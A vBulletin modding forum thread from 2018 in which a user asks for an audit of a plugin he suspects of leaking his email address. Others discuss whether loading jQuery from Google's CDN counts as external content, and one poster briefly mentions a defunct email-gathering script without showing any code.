Register Members List Search Today's Posts Mark Forums Read

Reply
 
Thread Tools
  #1  
Old 27 Jan 2018, 15:47
X-or X-or is offline
 
Join Date: Nov 2005
suspicious plugin?

https://www.vbulletin.org/forum/showthread.php?t=324918

Can someone audit this plugin for potential malicious code?
The nonsensical results of the plugin and the apathy of the author are worrying me a lot.
Here's a mirror : https://www.sendspace.com/file/05icvb
Reply With Quote
  #2  
Old 27 Jan 2018, 18:14
Dave Dave is offline
 
Join Date: Jun 2010
Real name: Dave
It seems fine to me at first sight, what makes you think it could contain malware?
__________________
https://technidev.com - security, development, exploits, vBulletin
dave[at]technidev[dot]com

Contact me for custom vBulletin 3/4 work & server/website management.
Reply With Quote
  #3  
Old 27 Jan 2018, 23:33
X-or X-or is offline
 
Join Date: Nov 2005
First the product shows nonsensical results which were reported, but the author didn't react.
Secondly the product definitely uses external content and the author didn't put the proper warning, for example in admincp/slowplugins.php

line 15 : <script src="//ajax.googleapis.com/ajax/libs/jquery/2.1.4/jquery.min.js"></script>

I have recently received an email on a mail address I have never use besides receiving notification from my vbulletin, I'm trying to find where is the backdoor and this one product seems to be the most suspicious of all, it has left tons of data in the sql database even after uninstall.

I think the code of this product should definitely be audited.
Reply With Quote
  #4  
Old 28 Jan 2018, 01:58
In Omnibus's Avatar
In Omnibus In Omnibus is offline
 
Join Date: Apr 2010
Real name: Kris
Originally Posted by X-or View Post
First the product shows nonsensical results which were reported, but the author didn't react.
Secondly the product definitely uses external content and the author didn't put the proper warning, for example in admincp/slowplugins.php

line 15 : <script src="//ajax.googleapis.com/ajax/libs/jquery/2.1.4/jquery.min.js"></script>

I have recently received an email on a mail address I have never use besides receiving notification from my vbulletin, I'm trying to find where is the backdoor and this one product seems to be the most suspicious of all, it has left tons of data in the sql database even after uninstall.

I think the code of this product should definitely be audited.
Jquery isn't malicious code. Virtually every software program uses it. Hell, vBulletin uses it.
Reply With Quote
  #5  
Old 28 Jan 2018, 22:05
vBNinja's Avatar
vBNinja vBNinja is offline
 
Join Date: May 2011
Not sure if trolling... jQuery loaded from google’s cdn is maclicious code? I don’t even understand what exactly you claim to be malicious.

Also, why are you posting a mirror of it? It can be downloaded directly from the thread as it was posted.

What if your computer has malware and it infected the files you re-uploaded (without permission either)?

No one else has reported “malicious code” in it..

If you don’t like the product, simply uninstall it.
__________________
PM me for Custom Mod Requests/Work
Reply With Quote
  #6  
Old 29 Jan 2018, 17:09
Stingray27 Stingray27 is offline
 
Join Date: Jan 2006
Originally Posted by X-or View Post
Can someone audit this plugin for potential malicious code?
The nonsensical results of the plugin and the apathy of the author are worrying me a lot.
I think you worry too much.
There is nothing malicious about jQuery

What do you mean by "apathy of the author"
There are no rules that say authors have to respond within a certain time (or at all).

If the results are nonsensical to you then just dont use it. Problem solved.
Reply With Quote
  #7  
Old 30 Jan 2018, 14:30
BirdOPrey5's Avatar
BirdOPrey5 BirdOPrey5 is offline
 
Join Date: Jun 2008
Real name: Joe D.
Originally Posted by X-or View Post
First the product shows nonsensical results which were reported, but the author didn't react.
Secondly the product definitely uses external content and the author didn't put the proper warning, for example in admincp/slowplugins.php

line 15 : <script src="//ajax.googleapis.com/ajax/libs/jquery/2.1.4/jquery.min.js"></script>

I have recently received an email on a mail address I have never use besides receiving notification from my vbulletin, I'm trying to find where is the backdoor and this one product seems to be the most suspicious of all, it has left tons of data in the sql database even after uninstall.

I think the code of this product should definitely be audited.
X-or never said that jquery was malicious, he said the call to jquery is use of external content, which it technically is. However when the flag for "Uses external content" was created (over a decade ago, probably closer to 15 years) it was intended to for mods that used code presumably hosted by the mod creator, not necessarily open, public, and used all over the web.

In the decade and a half since the external code flag was created it has become much more common to link to safe, reliable, libraries hosted by sites like Google.

vBulletin does this too, but as an option. No one has to to make external calls to Google to use vBulletin, but it's smart to do so.

Whether a call to external jquery raises to the level of needing to click the external content flag is a debate for site moderators, I can see good points for both sides.
__________________
-Joe
Former vBulletin.org Staff Member

(@BirdOPrey5) Former vb.org Moderator. Fighting for a free & independent vb.org.
BirdOPrey5.com - Exclusive VB Mods! (Formerly Qapla.com) | Joe's Ultimate Off Topic
Note - I do not read my PMs often, do not expect quick replies.
Reply With Quote
  #8  
Old 01 Feb 2018, 19:58
TheLastSuperman's Avatar
TheLastSuperman TheLastSuperman is offline
 
Join Date: Sep 2008
Real name: Michael Miller Jr
This was already discussed prior in the thread and Joe even commented back then on it as well, reference: https://vbulletin.org/forum/showpost...&postcount=244

So it's use at your own risk as Joe mentioned, furthermore you can simply edit out the parts of the mod containing that code before you install on your site.
__________________
Daddy Does Dios and Figs!
https://www.linkedin.com/in/thelastsuperman - Custom vBulletin Modifications, Styles, and Services.
Need a Host? I recommend URLJet.

Search - Use the search feature to find similar issues/answers.
Information - Include screenshots, copy/pasted error codes, url etc.
Fixed - Please return to your thread/post and let us know how it was fixed!
Thanks - For participating! Click the "Like" on a post if someone helped you!
Reply With Quote
  #9  
Old 01 Feb 2018, 20:05
Dave Dave is offline
 
Join Date: Jun 2010
Real name: Dave
I checked the code and couldn't find the SQL injection backdoor, the email address gathering script is in there though but it doesn't do anything since the site it sends requests to is no longer online.
__________________
https://technidev.com - security, development, exploits, vBulletin
dave[at]technidev[dot]com

Contact me for custom vBulletin 3/4 work & server/website management.
Reply With Quote
  #10  
Old 02 Feb 2018, 00:53
IggyP IggyP is offline
 
Join Date: May 2012
Originally Posted by TheLastSuperman View Post
This was already discussed prior in the thread and Joe even commented back then on it as well, reference: https://vbulletin.org/forum/showpost...&postcount=244

So it's use at your own risk as Joe mentioned, furthermore you can simply edit out the parts of the mod containing that code before you install on your site.
hmm this is a different mod than the OP linked...fwiw...
Reply With Quote
  #11  
Old 02 Feb 2018, 12:50
BirdOPrey5's Avatar
BirdOPrey5 BirdOPrey5 is offline
 
Join Date: Jun 2008
Real name: Joe D.
Originally Posted by IggyP View Post
hmm this is a different mod than the OP linked...fwiw...
Different mod and different mod author.
__________________
-Joe
Former vBulletin.org Staff Member

(@BirdOPrey5) Former vb.org Moderator. Fighting for a free & independent vb.org.
BirdOPrey5.com - Exclusive VB Mods! (Formerly Qapla.com) | Joe's Ultimate Off Topic
Note - I do not read my PMs often, do not expect quick replies.
Reply With Quote
  #12  
Old 05 Feb 2018, 22:31
TheLastSuperman's Avatar
TheLastSuperman TheLastSuperman is offline
 
Join Date: Sep 2008
Real name: Michael Miller Jr
o.O apparently so ^ there were two reported posts and I clicked on the wrong link! Sometimes oversight is awesome .
__________________
Daddy Does Dios and Figs!
https://www.linkedin.com/in/thelastsuperman - Custom vBulletin Modifications, Styles, and Services.
Need a Host? I recommend URLJet.

Search - Use the search feature to find similar issues/answers.
Information - Include screenshots, copy/pasted error codes, url etc.
Fixed - Please return to your thread/post and let us know how it was fixed!
Thanks - For participating! Click the "Like" on a post if someone helped you!
Reply With Quote
  #13  
Old 08 Feb 2018, 04:01
X-or X-or is offline
 
Join Date: Nov 2005
Originally Posted by Dave View Post
I checked the code and couldn't find the SQL injection backdoor, the email address gathering script is in there though but it doesn't do anything since the site it sends requests to is no longer online.
Email address gathering script?
Isn't it against the rules?

--------------- Added 08 Feb 2018 at 22:30 ---------------

@Dave , could you please provide more details about this email gathering script? Sounds like a very malicious thing.
Reply With Quote
  #14  
Old 31 Jul 2018, 11:16
X-or X-or is offline
 
Join Date: Nov 2005
Nobody wants to audit this product, really?

Again I would like to stress the webmaster email was leaked after installing this product....
And maybe the whole database, who knows...
Also this is a product that outputs utterly nonsensical results which only adds to the suspicion
Is this site dead or something, why nobody looks into it
Reply With Quote
  #15  
Old 31 Jul 2018, 16:59
BirdOPrey5's Avatar
BirdOPrey5 BirdOPrey5 is offline
 
Join Date: Jun 2008
Real name: Joe D.
Originally Posted by X-or View Post
Nobody wants to audit this product, really?

Again I would like to stress the webmaster email was leaked after installing this product....
And maybe the whole database, who knows...
Also this is a product that outputs utterly nonsensical results which only adds to the suspicion
Is this site dead or something, why nobody looks into it
All of the above? The mod hasn't been updated in over 5 years. It probably doesn't even work on PHP 7. If you are unsure about using it, don't use it. If the results are "nonsensical" than it is no loss.

Is the site dead? Not technically, we're posting here... but it is a fraction of what it used to be and even 5 years ago it was a fraction of what it was 5 years before that.
__________________
-Joe
Former vBulletin.org Staff Member

(@BirdOPrey5) Former vb.org Moderator. Fighting for a free & independent vb.org.
BirdOPrey5.com - Exclusive VB Mods! (Formerly Qapla.com) | Joe's Ultimate Off Topic
Note - I do not read my PMs often, do not expect quick replies.
Reply With Quote
Reply



Currently Active Users Viewing This Thread: 1 (0 members and 1 guests)
 
Thread Tools

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is On
HTML code is Off
Forum Jump


New To Site? Need Help?

All times are GMT. The time now is 21:25.

Layout Options | Width: Wide Color: